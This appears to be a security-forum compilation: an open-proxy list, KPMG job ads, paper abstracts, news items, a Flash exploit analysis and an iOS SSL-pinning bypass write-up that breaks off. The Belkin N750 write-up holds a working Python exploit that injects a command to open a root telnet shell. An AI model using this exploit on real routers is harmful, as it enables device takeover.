223.84.82.206:8123 223.86.122.39:8123 223.86.127.219:8123 223.86.127.27:8123 223.86.127.57:8123 223.86.171.47:8123 223.86.215.67:8123 223.86.216.148:8123 223.86.217.177:8123 223.86.217.37:8123 223.86.218.118:8123 223.86.218.22:8123 223.86.219.193:8123 223.86.223.179:8123 223.86.3.124:8123 223.86.32.6:8123 223.86.40.248:8123 223.86.6.44:8123 223.86.66.238:8123 223.86.67.105:8123 223.86.67.61:8123 223.86.7.110:8123 223.86.7.221:8123 223.86.7.51:8123 223.86.7.63:8123 223.86.72.148:8123 223.86.9.83:8123 223.87.108.106:8123 223.87.114.209:8123 223.87.159.77:8123 223.87.183.43:8123 223.87.62.203:8123 223.87.76.128:8123 223.99.188.73:8090 223.99.188.74:8090 23.226.131.196:8080 23.232.196.1:80 23.232.196.10:80 23.232.196.13:80 23.232.196.14:80 23.232.196.2:80 23.232.196.4:80 27.109.140.205:80 27.115.18.18:8080 27.131.190.66:8080 27.131.47.131:8080 27.145.145.105:8080 27.187.155.71:8088 27.3.142.237:9064 27.5.192.190:9064 27.50.128.242:88 31.15.48.12:80 31.3.246.183:7080 31.7.232.102:3128 36.224.219.91:8088 36.226.118.20:9064 36.227.225.141:8088 36.227.4.45:8088 36.231.127.68:8088 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.73.141.145:31281 36.74.37.6:8888 36.78.128.251:31281 36.80.35.69:8080 37.131.208.141:8080 37.157.192.146:3128 37.236.167.250:80 37.239.46.10:80 37.239.46.18:80 37.239.46.50:80 37.239.46.58:80 37.60.66.108:8080 37.60.66.109:8080 41.188.49.163:3128 41.73.230.39:8080 41.89.96.36:3128 42.117.3.73:3128 42.202.146.58:8080 42.62.61.245:80 46.32.231.84:80 49.113.241.95:8585 49.204.134.166:9064 49.204.176.99:9064 49.207.213.194:9064 49.207.217.125:9064 49.207.227.208:9064 49.207.29.74:9064 5.102.108.198:80 5.135.98.240:80 5.153.230.44:80 5.196.5.145:3128 58.146.102.176:9064 58.248.156.53:9999 58.248.156.54:9999 58.248.80.61:9999 58.248.81.11:9999 58.251.78.71:8088 58.252.0.25:9999 58.253.238.242:80 58.253.238.243:80 58.42.236.241:80 58.64.130.14:8080 58.64.130.18:8080 58.96.168.83:9999 59.115.10.115:9064 59.12.160.20:3128 59.151.103.14:80 59.151.103.15:80 59.188.252.249:3128 59.46.72.245:8080 60.12.11.60:808 60.12.69.110:80 60.190.138.151:80 60.207.166.152:80 60.21.132.218:63000 60.213.189.170:3988 60.214.67.86:9999 60.221.253.204:80 60.55.43.74:80 61.133.51.6:9999 61.149.182.102:8080 61.155.169.11:808 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.172.44.138:9999 61.19.114.178:8080 61.19.121.121:3128 61.19.121.154:3128 61.19.30.198:8080 61.19.42.244:8080 61.19.69.252:8080 61.219.16.16:8888 61.223.145.222:9064 61.227.218.171:3128 61.228.146.138:8088 61.228.233.132:9064 61.230.107.88:8088 61.230.21.131:8088 61.234.123.64:8080 61.58.84.209:8088 62.103.107.9:80 62.108.122.173:3128 64.31.22.131:7808 64.31.22.131:8089 64.74.219.86:80 65.49.14.147:3080 65.49.14.147:3128 66.10.94.36:80 66.10.94.36:8080 66.135.118.156:80 66.162.208.10:3128 66.192.33.78:3128 66.192.33.78:8080 67.148.11.168:443 74.253.21.252:8080 74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.133.69.131:8080 76.76.105.124:3128 78.107.199.67:8080 79.106.108.139:8080 80.82.69.72:3128 83.246.129.250:3128 88.156.27.199:8080 88.198.24.108:3128 89.191.131.243:8080 89.232.139.253:80 89.249.207.65:3128 89.46.101.122:7808 89.46.101.122:8089 91.218.230.152:3128 91.227.93.20:80 91.238.29.192:9999 93.115.8.229:7808 93.115.8.229:8089 93.188.166.85:80 93.85.92.109:3128 93.87.74.182:8080 94.180.115.232:80 94.198.38.20:8080 94.247.174.117:18080 95.167.39.34:8080 95.65.22.132:3128 95.86.133.141:3128 98.103.146.102:80 [/LIST] Sursa: 08-11-14 | Fast Proxy Server List (1655) - Pastebin.com

Firma: KPMG - In echipa cu mine. IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? An IT Security Consultant (Penetration Tester/ Ethical Hacker) for our IT Advisory team. Job profile: • Conduct technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits; • Identify and exploit technical vulnerabilities in clients’ systems, assess business risks of the technical vulnerabilities and communicate to client personnel; • Perform security configuration analysis for various operating systems, especially Windows and Linux / UNIX; • This is a position in the Penetration Testers Team which requires quick learning and working with new technologies, tools and techniques. Some typical projects that you will work on (depending on your expertise) are: • Web application penetration testing: try to find vulnerabilities in web applications (ex. Internet Banking, eCommerce websites, web portals, etc) and report them to the clients. Try to exploit these vulnerabilities in order to prove their business impact. • Internal network penetration testing: simulate a malicious person who already has access to the internal network of the customer (ex. visitor, consultant, etc). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags. • Mobile application penetration testing: try to find vulnerabilities in mobile applications (Android, iOS, Windows phone) and suggest corrective measures in order to improve their security. • Other types of technical projects that will involve your imagination and out-of-the-box thinking may also occur. • It is sometimes required to make demonstrations and presentations to clients. • We encourage technical research and presenting our results to hacking conferences - local and international. Specific requirements: • Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. • In order to understand the technical level that we need, here are a few terms/concepts that we expect you to be familiar with: OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others. • You also must be able to express your findings in very good technical and business English (oral and written). • Other desired requirements are: - Bachelor’s degree in an IT related field; - Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development; - Work effectively either individually or as a member of a multi-skilled team; - Professional discipline, accuracy, reliability and excellent analytic skills; - Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation. Will be considered a plus Certifications such as: OSCP, OSCE, CEH, LPT, CCNA, MCSE. Nota: Va pot oferi orice fel de informatie (non-confidentiala). PM daca sunteti interesati. Bestjobs: IT Security Consultant la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? An Application Developer for our IT Advisory team. The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio - the development environment and Microsoft SQL Server - the data storage engine. Responsibilities: • Building new systems with ASP.MVC , ASP.NET , SQL Server 2008/ 2012 , Entity Framework and Linq; • Developing new functionality on our existing software products; • Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations; • Participating in a small, experienced, energetic development team. Requirements: • Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience; • Web development experience (ASP.MVC ,ASP.NET, Java script, AJAX, CSS, JSON, JQUERY) - minimum 4 years of experience; • Very good knowledge of T-SQL and relational database design - minimum 4 years of experience; • Graduate of Computer Science/Cybernetics/Information Technology/Electronics College; • Fluent in English; • Ability and willingness to work as part of a team of developers; • Learning oriented person. Additional advantage: • Active Reports, SQL Reporting Services; • Java & Install Shield knowledge; • Active Directory knowledge; • Knowledge of WCF Web Services, WCF Data Services. Nota: Va pot oferi mai multe informatii. PM daca sunteti interesati. Bestjobs: Application Developer la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easy with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess a very good time management and task follow-up skills. Moreover, should demonstrate rigor in his daily routine while treating all staff requirements with solicitude. Job objective The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems and determine source, and advice on appropriate action. Responsibilities: • Respond to requests for technical assistance in person, via phone, and email; • To assist end-users in all IT applications and equipment related issues; • Diagnose, resolve, document resolutions for future reference technical hardware and software issues; • Determine source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action; • Serve as liaison between staff and the IT department to resolve issues; • Perform hardware and software installations; • Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates; • To ensure, as part of the IT team, the proper operation of all IT and Telecommunication items /equipment; • To take part in the implementation of new IT applications and/or management information systems; • To contribute to the development, improvement and implementation of new IT policies within the Firm and to monitor staff compliance; • To provide full end-user support in using customized specific IT applications; • To deliver on the spot and / or regular IT assistance to staff. Required skills: • University degree in Information Technology or related sciences; • At least 2 years prior work experience as a member of a IT team; • Relevant work experience in hardware, software & communication troubleshooting; • Knowledge of Windows 7/8, Office Application - Microsoft certification desirable; Performance standard requirements: Core Competencies defined for Infrastructure staff (link) Nota: Va pot oferi mai multe informatii. PM cine e interesat. Bestjobs: IT Service Desk la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) Candidate profile: Participate to IT advisory projects together with other team members; Assist the in-charge and the manager during the fieldwork and project documentation; Perform various project related tasks in accordance with the instructions of the in-charge and the manager; Document the information in dedicated working papers as per KPMG methodology; Assume indicated roles in projects according to your position; Liaise with the clients to understand, obtain and assess specific information. Specific requirements: Bachelor degree in Economics, Information Systems Management, Cybernetics, Information Technology or related; Information Technology knowledgeable and passionate; Ability to communicate accurately and efficiently in English, both verbally and in writing; Flexible in working independently or in a team, as required by tasks assigned; Ability to understand and meet deadlines and to perform work under pressure; Previous experience in a consulting company would be a plus; Available for business travel; Drive for developing professionally and building long term relationships with clients and colleagues. Nota: Va pot oferi mai multe informatii. PM daca e cineva interesat. Bestjobs: IT ADVISORY JUNIOR/ INTERN la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

XML Schema, DTD, and Entity Attacks May 19, 2014 Version 1.0 Timothy D. Morgan (@ecbftw) Omar Al Ibrahim (oalibrahim@vsecurity.com) Contents Abstract...............................................................................................................................................................................3 Introduction........................................................................................................................................................................4 Motivation............................................................................................................................................................................................................. 4 Background........................................................................................................................................................................................................... 4 Prior Art................................................................................................................................................................................................................ 5 General Techniques...........................................................................................................................................................6 Resource Inclusion via External Entities........................................................................................................................................................ 6 URL Invocation.................................................................................................................................................................................................... 7 Parameter Entities.............................................................................................................................................................................................. 9 External Resource Inclusion via XInclude Support................................................................................................................................... 12 Denial of Service Attacks................................................................................................................................................................................ 13 Implementation-Specific Techniques and Limitations.............................................................................................15 Java / Xerces...................................................................................................................................................................................................... 15 C# / .NET........................................................................................................................................................................................................... 19 Expat.................................................................................................................................................................................................................... 24 Libxml2................................................................................................................................................................................................................ 25 PHP...................................................................................................................................................................................................................... 26 Python................................................................................................................................................................................................................. 28 Ruby..................................................................................................................................................................................................................... 28 Recommendations For Developers............................................................................................................................29 Java / Xerces...................................................................................................................................................................................................... 29 C# / .NET........................................................................................................................................................................................................... 30 Expat.................................................................................................................................................................................................................... 32 Libxml2................................................................................................................................................................................................................ 32 PHP...................................................................................................................................................................................................................... 32 Python................................................................................................................................................................................................................. 32 Ruby..................................................................................................................................................................................................................... 33 Recommendations For XML Library Implementors..............................................................................................33 Future Work.....................................................................................................................................................................34 Acknowledgements........................................................................................................................................................34 References........................................................................................................................................................................35 Download:http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

CONTENT Introduction It's all about entities Parameter entities Validity and well-formedness XXE Data Retrieval Peculiar features of attacks on various parsers References About Positive Technologies Download: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf

How To Steal $999,999.99 From Visa Contactless Cards Without PIN. Posted on November 6, 2014 by Waqas Findings from the newly submitted research paper at Newcastle University will shock many of the people using VISA contactless payment system. Amazing aspect of the research is that it doesn’t involve any kind of hack, it’s just a trick that can force contactless payment owners to pay much more than they were willing to spend. Such an attack is a special type of Man in the Middle (MitM) attack. So, fasten your seat belts and get ready because something quite astonishing is about to be unraveled! Let’s first look at how contactless bank payment system work. Contactless bank payment (relies on near field communication technology) allows it’s users to pay on the wavier of the card at the payment terminal (card must be within 5cm of the terminal to work). The system is widely used at a number of places (London’s Oyster and Sydney’s Opal are the examples) to charge the users instantaneously. When a user waivers the card through electromagnetic field, an antenna inside the card produces a small current and this wakes up the chip inside the card which reads the data, makes the calculations and provides the reply. Now you must be wondering what’s wrong with the system. Really, there is a massive loop hole in the system let me unravel it. Consider a rigged payment terminal put into place and it detects your card for payment. Though, for only small transactions (less than $20) no pin is required but serious cash can be made if machine can trick through large number of cards each day. It’s like a magnetic field that is always looking to attract different types of materials. Researchers when researched deep into this problem, they found number of concerns over the usage of cards and the related policies: 1. When using VISA cards for foreign payments, the restriction of entering PIN for payments over 20 pounds is omitted. 2. When paying in foreign currency, the official restriction in term of local currency for the payment is omitted. And the card can be charged amount as large as 8-figures. So, if you are in UK your card can be charged up to US$999,999.99 (Not a bad deal for an ordinary thieve J) 3. When paying offline over 100 pounds in foreign currency, security for the payment is reduced and the card is made committed for the transaction without even involving the bank. Though, researchers are not yet sure if transactions exceeding the available balance are allowed or not but once the transaction is made offline the thieve can easily create fake document to claim money or show the money belongs to him and the real owner only gets updates once the transaction is processed. Another concern that is not related to the usage of cards but the terminals: 1 Terminals can even work as spying tool, as many people use these NFC terminals to have the information to their smartphones offline and if rigged these terminal can easily gather information from the people’s smartphones. So, what should be done to stop this from becoming a reality? Well, the researchers have listed some important tips for the contactless payment system and the developers. Tip for the developers: 1. Always require a PIN for foreign currencies. 2. Always require online transaction verification for foreign currencies. Tips for Technology users: 1 If you don’t travel overseas regularly, ask your bank if it offers an option to prevent transactions in foreign currencies. 2. Keep your card in a wallet or cover that blocks electromagnetic radiation so it has to be taken out to be used. 3. Do your low value payments with cash, so you don’t need contactless transactions enabled on your card at all. Sursa: http://hackread.com/how-to-steal-million-from-visa-contactless-cards/

EFF: VPNs will crumble Verizon's creepy supercookie stalkers Now that ad networks are jumping on the privacy vulnerability By Iain Thomson, 6 Nov 2014 The Electronic Frontier Foundation says Verizon's silent supercookies, which always follow subscribers around the internet, are being abused by creepy advertisers to push targeted ads. The EFF says people should start using encrypted VPNs by default to claw back their privacy, because opting out of the system is not enough. Two years ago Verizon started stamping a unique identifier token header (UIDH) on each website visit made by subscribers via its cellular data network. As the name suggests, the identifiers are unique to each person, allowing website owners to quietly build up profiles on people using these ID codes. These records of online behavior are valuable to advertisers, as it allows them to get an idea of which adverts to display to each person: someone tracked across cycling websites will end up being shown ads for new bikes, for example. Verizon allows people to "opt-out" of the system, meaning the telco won't allow advertisers to directly request and analyze your online wanderings, but the setting is mostly useless: every single HTTP request via its network is stamped with a UIDH regardless of the opt-out, and is thus visible to any web server one visits. Now it appears that ad networks are using the UIDHs to monitor internet users without all that tiresome business of actually paying Verizon for the privilege, and since the system is baked in by the company there's very little people can do to stop them. Code has already appeared on Github (since removed) that would allow anyone with the right setup to track Verizon's identifier, and reports are surfacing that Twitter has also managed to find out a way to follow the telco's clients online using the UIDH information. The UIDH system is also pernicious in that it bypasses the anti-tracking measures in iOS and Android that are designed to protect mobile users' privacy: these measures tackle web cookies, rather than the specific UIDH HTTP header. "It is possible to build an opt-out system that would stop this, but it would take a considerable amount of work and the current systems just can't do it," EFF staff technologist Jacob Hoffman-Andrews told The Register. Stamping on a mandatory ID number on subscribers is such a nice idea that AT&T is also reportedly considering the same "feature" for its customers. The only way to block the use of the UIDH system is to use a VPN and/or Tor for your online browsing. Tor is usually your go-to software for privacy but it can be difficult to set up on a mobile, but almost all smartphones have a VPN mode baked in and Hoffman-Andrews recommended users activate it to maintain online anonymity. "The only way, in the short term, to stop this is if enough people complain about it," Hoffman-Andrews said. "Longer term, once we get encryption across the whole internet, this kind of thing will be less of an issue. But that's 10 or 20 years away at least." ® Sursa: EFF: VPNs will crumble Verizon's creepy supercookie stalkers • The Register

[h=1]From 0-day to exploit – Buffer overflow in Belkin N750 (CVE-2014-1635)[/h] Vulnerability Summary A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network. Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router. Vulnerability Discovery Fuzzing plays an important role in vulnerability discovery and this time was not different. After some fuzzed requests I noticed that the POST parameter “jump” suffered from a classic buffer overflow with a payload containing 5000 bytes. After the referred buffer overflow the process died. This behavior was consistent with a traditional buffer overflow and the question that popped in my mind was if this was exploitable. To try to clear this out I considered two possible approaches to be able to analyze the vulnerable process: Virtualization of the router process – would enable the debugging of the mips32 process in an x86 machine but probably needed some binary patching or function injection to bypass hardware or configuration access limitations on QEMU. Patching the router firmware – Would enable to open a backdoor and to put debugging tools inside the router with some risk of bricking the router in the process. In the first stage of the investigation I decided that virtualization of the affected process was the simplest and less risky approach to investigate the exploitability of this vulnerability. To get this done I downloaded the firmware to identify the process responsible for the crash. After binwalking the firmware and finding a linux mips32 system, both virtualization and patching approaches seemed viable since all files were extracted without problems. Binwalk extracted the squashfs filesystem from the image, and in few minutes the router filesystem was available to further analysis. By analyzing the strings in the http and minhttp binaries, it was possible to discover that the webserver available in the guest wifi network where the buffer overflow occurred was in fact minhttp. The Virtualization As stated above, to better analyse this vulnerability I decided to virtualize the minhttp process. For that I used qemu-mipsel-static since there is a lot of info about the subject and I had previous successful experiences with it. At first try qemu-mipsel-static refused to execute the minhttp deamon: The error “Can’t bind to any address” in this context means that the process is trying to bind to an IP address that does not exist on the system. A grep on the binary immediately discloses the IP address where the process was trying to bind. With the correct IP address on the interface, qemu is finally able to run the process, but after trying to access the contents of the site strace shows us that the CWD is wrong and that the process running with a wrong current working directory is not able to get and present the html files. This happens because the execution of the qemu must be done on a chroot of the firmware, which means that the execution of the binary will have the root of the file system of the firmware as CWD and not the /www as expected by minhttpd. To solve this issue I remembered of two possible approaches and both worked. The first was to use LD_PRELOAD to load a custom library hooking a used function in minhttpd and that function executes the Change Directory. The second was to use the binfmt module to execute in a seamless manner the mips32 binary and instead of executing the minhttpd directly from qemu I executed the mips32 /bin/sh inside the chroot of the firmware and then changed the CWD to the correct place before executing the minhttpd binary using the mips32 /bin/sh. To configure the binfmt I used the following signature: echo ‘:mipsel:M::\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00:\xff\xff\xff \xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff:/usr/bin/qemu-mipsel-static:’ > /proc/sys/fs/binfmt_misc/register The following image shows the execution of the mips32 process on an x86 system using binfmt: After all the tweaks necessary to put the process running I activated the instruction tracing in QEMU (-d in_asm,cpu) and confirmed the exploitability: Ok now, I had confirmation that this vulnerability could be exploited with a payload with mips32 machine code. While trying to identify the correct amount of bytes I used incremental buffers and noticed that the minhttp process had different behaviors with different payload sizes: Bellow ±1300 bytes the request was correctly handled Above ±1300 and below ±2000 the minhttp process returned an empty http response Above ±2000 bytes the minhttp process crashed It seemed that a buffer size between ±1300 and ±2000 crashed something, but was not enough to crash the process. This strange behavior needed a deeper analysis and quickly after stracing the process I had confirmation that this vulnerability was much more than a simple buffer overflow with remote machine code execution. The strace below shows that buffers bigger than ±1300 bytes trigger some kind of execution using /bin/sh. With a payload that is big enough, it is possible to execute the string on the request as we can see on the underlined execve(). But how to take advantage of this backdoor-like vulnerability? The Disassembler came in my help. Reverse Engineering for the root cause Using the IDAPro disassembler I was able to identify the problem, the overflow occurred due to the usage of the insecure strcpy() function. The vulnerability exists due to improper buffer handling using the strcpy() function in the address 0×00402570 as presented in the image below: The source buffer processed by strcpy() comes from POST parameter “jump” and is returned by the get_cgi() function in 0×00402550. The buffer overflow enables the control of a variable named do_xread located in the heap and that is used to decide the execution of CGIs. The decision point occurs at address 0x0040338C where the $v1 register that has the value of the overwritten do_xread is compared with zero. The CGI execution is done using the popen() function as we can see in address 0x004033D0. The popen() function opens a process by creating a pipe, forking, and invoking the shell, so the argument to popen() is supposed to be a pointer to a null-terminated string containing a shell command line that will be passed to /bin/sh using the -c flag. The name of the CGI to be executed is also in the heap and somewhere between 0x004476D0 and 0x00447AD0 near do_xread. So since the two variables are conveniently near each other it is possible with only one oversized payload processed by strcpy() to overwrite the do_xread(the control variable) and the byte_4476D0 (variable with the name of the CGI to be executed). As described before, the name of the CGI is processed with popen() so, instead of a file name we can inject several commands at once, separated for instance by semi-colon. This vulnerability enables control over a part of heap memory where a variable that forces the execution of a CGI and also the variable with the name of the CGI to be executed are stored. In conclusion, the requirements for injecting commands are fulfilled. Vulnerability Exploitation An attacker could exploit this vulnerability by preparing a special POST where the parameter “jump” takes some padding (1379 bytes) concatenated with the commands to be executed and with something different from zero to overwrite the do_xread and enter the section of code that invokes the popen() by failing the jump BEQZ at address 0x0040338C. The image below shows the execution of the utelnetd using this exploit. Exploit Code The following Python code to exploit this vulnerability enables the execution of commands in the router, in this case the telnet service is started and by default the login program is /bin/sh so… with no login prompt. #!/usr/bin/python #Title : Belkin n750 buffer overflow in jump login parameter #Date : 28 Jan 2014 #Author : Discovered and developed by Marco Vaz <mv@integrity.pt> #Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C) import httplib headers = {} body= “GO=&jump=”+ “a”*1379 +”%3b”+ “/usr/sbin/utelnetd -d” +”%3b&pws=\n\n” conn = httplib.HTTPConnection(“192.168.169.1?,8080) conn.request(“POST”, “/login.cgi”, body, headers) response = conn.getresponse() data = response.read() print data I have developed a Metasploit module to exploit this vulnerability that also executes iptables commands so that it is possible to access telnet server directly from the guest network to the root shell. You can get it here: belkin_rce_cve-2014-1635.rb. Written by Marco Vaz Sursa: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/

Cracking the CVE-2014-0569 nutshell msft-mmpc 5 Nov 2014 5:00 PM ?The Microsoft Malware Protection Center (MMPC) has recently seen an exploit targeting the Adobe Flash Player vulnerability CVE-2014-0569. This exploit is being integrated into the Fiesta exploit kit. The vulnerability related to this malware was addressed with a patch released by Adobe on 14 October 2014. Adobe Flash Player desktop runtime for Windows versions 15.0.0.167 and earlier are vulnerable. If you're using a vulnerable Adobe Flash Player version you should update now to help protect your PC. We analyzed how these attacks work and found the following details. The exploit successfully bypasses the validation of memory range and is able to access an arbitrary location. It attempts to corrupt the VTABLE entry for the virtual function toString( ) of sound object. Later, the ActionScript calls the Sound.toString() method and control is transferred to the controlled address, as shown in Figure 1. Figure 1: Transfer control via a corrupted VTABLE Sound.toString() At the controlled address, it starts the ROP gadgets built from the Flash Player DLL, as shown in Figure 2. Figure 2: Control transferred to ROP gadgets These ROP gadgets are a bit convoluted, but they can be summarized in following steps: The gadgets prepare the data on the stack using a loop of the following gadgets: dec eax // decrement the address to build code ret pop ecx // store the code bytes in ECX ret mov dword ptr [eax],ecx // store the code to the address specified by EAX pop ebp ret The control is passed to (via a ret instruction) API VirtualAlloc() to allocate a 0x1000 byte buffer. It uses gadget: mov dword ptr [eax],ecx // store the code pop ebp ret to build some new gadgets at the start of the allocated buffer, for example: mov dword ptr [eax+0Ch],ecx ret These new gadgets build up a small piece of two-layer decryption code to decrypt the shellcode: Control is passed over to the fully decrypted shellcode. The shellcode downloads a file from the remote server and executes it. The downloaded file is detected as TrojanDropper:Win32/Ropest.A. As well as keeping your software up-to-date, we also recommend running a real-time security product such as Microsoft Security Essentials to help protect your PC from this and other threats. Chun Feng MMPC Sha1: 468f23ef2f6318ea59a3cbc5570ac766435a5315 (detected as Exploit:SWF/Fiexp.B) 61a776fda7d50655ea336b22499573250fa8761d (detected as TrojanDropper:Win32/Ropest.A) Sursa: Cracking the CVE-2014-0569 nutshell - Microsoft Malware Protection Center - Site Home - TechNet Blogs

Reflected File Download - A New Web Attack Vector PLEASE NOTE: As promised, I've published a full white paper that is now available for download: White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif. On October 2014 as part of my talk at the Black Hat Europe 2014 event, I presented a new web attack vector that enables attackers to gain complete control over a victim’s machine by virtually downloading a file from trusted domains. I decided to call this technique Reflected File Download (RFD), as malware can be "downloaded" from highly trusted domains such as Google.com and Bing.com without ever being uploaded. As long as RFD is out there, users should be extremely careful when downloading and executing files from the web. The download link might look perfecty fine and include a popular, trusted domain and use a secure connection, but users still need to be wary. Look at the following link for example. Up until a few months ago, it could have been used to steal ALL cookies from your browser, perform actions on your behalf and steal emails from your Gmail inbox: https://www.google.com/s;/ChromeSetup.bat Google fixed the vulnerability so that the link above now only downloads a harmless text file. RFD, like many other Web attacks, begins by sending a malicious link to a victim. But unlike other attacks, RFD ends outside of the browser context: 1) The user follows a malicious link to a trusted web site. 2) An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was “hosted” on the trusted web site. 3) The user executes the file which contains shell commands that gain complete control over the computer. Figure 1 – The three steps attack flow of reflected file download For a Reflected File Download attack to be successful, there are three simple requirements: 1) Reflected – Some user input is being “reflected” to the response content. This is used to inject shell commands. 2) Filename – The URL of the vulnerable site or API is permissive and accepts additional input. This is often the case and is used by attackers to set the extension of the file to an executable extension. 3) Download – The response is being downloaded and a file is created “on-the-fly” by the Web browser. The browser then sets the attacker-controlled filename that was parsed in requirement 2 above. Figure 2 – A service is vulnerable if the three RFD requirements are met Articol complet si video: Reflected File Download - A New Web Attack Vector - SpiderLabs Anterior

Intercepting the App Store's Traffic on iOS TL;DR: By default, MobileSubstrate tweaks do not get injected into system daemons on iOS which explains why my SSL Kill Switch tool wasn’t able to disable SSL certificate validation in the iTunes App Store. The problem Last year I released the iOS SSL Kill Switch, a tool designed to help penetration testers decrypt and intercept an application’s network traffic, by disabling the system’s default SSL certificate validation as well as any kind of custom certificate validation (such as certificate pinning ). While the tool worked well on most applications including SSL-pinning apps such as Twitter or Square, users reported that it didn’t work the iTunes App Store, which would still refuse to connect to an intercepting proxy impersonating the iTunes servers. Other similar tools such as Intrepidus Group’s trustme also seemed to have the same limitation. A quick look at the App Store on iOS The first step was to get the right setup: An intercepting proxy (Burp Pro) running on my laptop. An iPad with the SSL Kill Switch installed, and configured to use my laptop as the device’s proxy. After starting the App Store app, I noticed that I could already intercept and decrypt specific SSL connections initiated by the App Store: all the HTTP requests to query iTunes for available apps (as part of the App Store’s tabs such as Featured'',Top Charts’’, etc.) as well as app descriptions (Details'', Reviews’’). However, more sensitive operations including user login or app installation and purchase would fail by rejecting my intercepting proxy’s invalid SSL certificate. From looking at logs on the device, it turns out that two distinct processes are behind the App Store’s functionality: AppStore[339] <Warning>: JS: its.sf6.Bootstrap.init: Initialize itunesstored[162] <Error>: Aug 22 11:29:10 SecTrustEvaluate [root AnchorTrusted] AppStore is the actual App Store iOS application that you can launch from the Springboard. It is responsible for displaying the App Store UI to the user. itunesstored is a daemon launched at boot time by launchd, the process responsible for booting the system and managing services/daemons. tunesstored seems to be responsible for the more sensitive operations within the App Store (login, app purchase, etc.) and possibly some of the DRM/Fairplay functionality. Why SSL Kill Switch didn’t work I initially thought the issue to be that the strategy used by the SSL Kill Switch to disable certificate validation somehow wasn’t enough to bypass itunesstored’s certificate pinning. However, it turns out that the SSL Kill Switch was just not being injected into the itunesstored process at all, for a couple reasons: The itunesstored process is started as a daemon by launchd early during the device’s boot sequence, before MobileSubstrate and MobileLoader get started. Therefore, none of the MobileSubstrate tweaks installed on the device, including the SSL Kill Switch, get injected into this process. The SSL Kill Switch had a MobileLoader filter so that the code disabling certificate validation would only be loaded into apps linking the UIKit bundle (ie. applications with a user interface). This was initially done to restrict the effect of the SSL Kill Switch to App Store apps only. However, itunesstored is a daemon that doesn’t have a user interface, hence the filter prevented MobileLoader from injecting the SSL Kill Switch into the process. Man-in-the-Middle on itunesstored After figuring this out, getting itunesstored to stop validating SSL certificates was very straightforward. First of all, make sure you’re using the latest version of the SSL Kill Switch (at least v0.5). Then, all you need to do is kill the itunesstored process: iPad-Mini:~ root# ps -ef | grep itunesstored 501 170 1 0 0:00.00 ?? 0:01.95 /System/Library/PrivateFrameworks/iTunesStore.framework/Support/itunesstored 0 432 404 0 0:00.00 ttys000 0:00.01 grep itunesstored iPad-Mini:~ root# kill -s KILL 170 When doing so, launchd will automatically 